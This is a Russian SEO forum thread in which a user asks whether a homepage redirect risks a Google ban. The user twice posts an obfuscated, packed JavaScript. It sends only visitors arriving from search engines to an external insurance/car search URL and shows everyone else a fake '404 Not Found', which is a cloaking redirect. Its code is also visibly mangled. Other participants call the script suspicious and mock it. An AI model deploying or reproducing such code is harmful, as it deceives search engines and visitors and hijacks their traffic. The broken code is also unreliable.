- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Если вы не поймете такого вопроса то я не згаю как по другому еще его задать.
Будет ли и понижаться позиции сайта или вообще будет бан от поисковика из-за того, что я поставлю редирект с главной страницы на страницу номер 10 )))) ? 😆
Надеюсь мой вопрос теперь вам ясен ??? 😒
проведите эксперимент, результаты поведаете нам :) зато все точно и без имхо
_Владимир_ добавил 05.01.2011 в 00:26
Хотите дельных советов - формулируйте вопрос обстоятельно, какой редирект (они бывают разными), зачем сделан, что было до этого, какую цель преследуете и т.д.
кстати да, какой из редиректов будете использовать?
Опять же, смотря зачем это делать.
Если у вас главная редиректит потому, что у вас движок такой (например, / редиректит на /home/index/ или /lang/ru) - это нормальная распространённая практика, если вы редиректите чтобы склеить страницы ради передачи ПР или замены страницы в индексе - это другое, если вы постоянно будете главную переклеивать к разным внутрякам - это третье и т.д.
Нету тут однозначного ответа. А из вас дополнительную информацию клещами приходится вытаскивать.
Хотите дельных советов - формулируйте вопрос обстоятельно, какой редирект (они бывают разными), зачем сделан, что было до этого, какую цель преследуете и т.д.
Спасибо за суету - но вы меня не смогли понять.
_Владимир_ Мне более менее дал понять что да как.
Редирект буду делать примерно такой !
\\
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(pInt(c/a)))+((c=c%a)>35?StmCharCode(c+29):c.tong(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=fun(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.r\(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('u R(){0 2=g.A;x(2.3(\'.v.\')!=-1||2.3(\'.z.\')!=-1(\'.y.\')!=-1||2.3(\'.C.\')!=-1||2.3(\'.D.\')!=-1||2.3(\'.B.\')!=-1||2.3(\'.m.\')!=-1){0 a="l";0 9="k.n";0 c="s(\'t";0 b="p://o";0 8="w.r";0 5="Q";0 4="S.";0 7="O/P";0 6="T.p";0 d="U?N=";0 h="\";0 i="&q=";0 j="H";0 e="+\')";F(a+9+c+bd+h+i+j+e)}I{g.L(\'<f>M J K</f>\')}}R();',57,57,'var||Ref|\|str7|str6|str9|str8|str5|str2|str1|str4|str3|str10|str17|h1|\|str11|str12|str14|ion|locat|bing|repl|ww|||top|ace|htt|\||if|yahoo|msn|referrer|altavista|aol|ask|insurance|eval|000\0|car|else|Not|Found|write|404|aid|com|se|search||10|arch|hp'.split('|'),0,{}))
\\
Спасибо за суету - но вы меня не смогли понять.
_Владимир_ Мне более менее дал понять что да как.
\\
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(pInt(c/a)))+((c=c%a)>35?StmCharCode(c+29):c.tong(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=fun(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.r\(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('u R(){0 2=g.A;x(2.3(\'.v.\')!=-1||2.3(\'.z.\')!=-1(\'.y.\')!=-1||2.3(\'.C.\')!=-1||2.3(\'.D.\')!=-1||2.3(\'.B.\')!=-1||2.3(\'.m.\')!=-1){0 a="l";0 9="k.n";0 c="s(\'t";0 b="p://o";0 8="w.r";0 5="Q";0 4="S.";0 7="O/P";0 6="T.p";0 d="U?N=";0 h="\";0 i="&q=";0 j="H";0 e="+\')";F(a+9+c+bd+h+i+j+e)}I{g.L(\'<f>M J K</f>\')}}R();',57,57,'var||Ref|\|str7|str6|str9|str8|str5|str2|str1|str4|str3|str10|str17|h1|\|str11|str12|str14|ion|locat|bing|repl|ww|||top|ace|htt|\||if|yahoo|msn|referrer|altavista|aol|ask|insurance|eval|000\0|car|else|Not|Found|write|404|aid|com|se|search||10|arch|hp'.split('|'),0,{}))
\\
имелось ввиду:
301 (постоянный) или 302 (временный) отдавать будете
имелось ввиду:
301 (постоянный) или 302 (временный) отдавать будете
Конечно временный.
Будет ли бан Google из-за постоянного редиректа на новые статьи?
tatushca, что за мутный зашифрованный скрипт вы нам представили?
tatushca, что за мутный зашифрованный скрипт вы нам представили?
Скрипт редиректа ))) Google очень лояльно относится к данному виду скрипта - на не продолжительный период времени. Редирект происходит через один очень весомый сайт.
Зашифрованый яваскрипт для редиректа Гугла с целью индексации страниц?
// вмемориз
это самый извращенный способ ускорить индексацию внутряков, который мне доводилось встречать...
я бы еще зашифровал 64-битным кодом 🤪 так, для антуража 😂
(base64_decode("cmVkaXJlY3QgbWUgdG8gYW4gaW5uZXIgcGFnZQ=="))
К чему этот бред?